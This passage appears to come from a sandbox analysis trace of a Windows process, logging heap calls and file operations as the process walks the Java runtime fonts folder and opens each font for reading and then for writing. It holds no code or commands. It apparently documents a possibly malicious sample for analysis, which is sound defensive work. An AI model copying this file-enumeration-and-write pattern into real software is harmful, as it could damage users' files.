lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0096.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0096.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.887] AreFileApisANSI () returned 1 [0096.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0096.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 68 [0096.887] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansdemibold.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4d9c8)) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0096.887] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.887] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.887] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaa77c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaSansRegular.ttf", cAlternateFileName="LU761B~1.TTF")) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0096.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0096.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.888] AreFileApisANSI () returned 1 [0096.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf", lpUsedDefaultChar=0x0) returned 67 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0096.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.888] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0096.888] AreFileApisANSI () returned 1 [0096.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0096.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82ef8 [0096.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82ef8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 67 [0096.888] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.889] GetFileType (hFile=0x360) returned 0x1 [0096.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0096.889] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.889] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.889] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.889] CloseHandle (hObject=0x360) returned 1 [0096.889] AreFileApisANSI () returned 1 [0096.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x823b8 [0096.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 67 [0096.890] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.890] GetFileType (hFile=0x360) returned 0x1 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0096.890] CloseHandle (hObject=0x360) returned 1 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.891] AreFileApisANSI () returned 1 [0096.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0096.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82208 [0096.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf") returned 67 [0096.891] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidasansregular.ttf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaa77c)) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0096.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.891] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.891] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39254, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LucidaTypewriterBold.ttf", cAlternateFileName="LUE73B~1.TTF")) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0096.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.892] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0096.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.892] AreFileApisANSI () returned 1 [0096.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf", lpUsedDefaultChar=0x0) returned 70 [0096.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0096.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.893] AreFileApisANSI () returned 1 [0096.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0096.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a958 [0096.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 70 [0096.893] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.893] GetFileType (hFile=0x360) returned 0x1 [0096.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0096.893] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.893] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.894] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.894] CloseHandle (hObject=0x360) returned 1 [0096.894] AreFileApisANSI () returned 1 [0096.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0096.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ac50 [0096.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 70 [0096.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 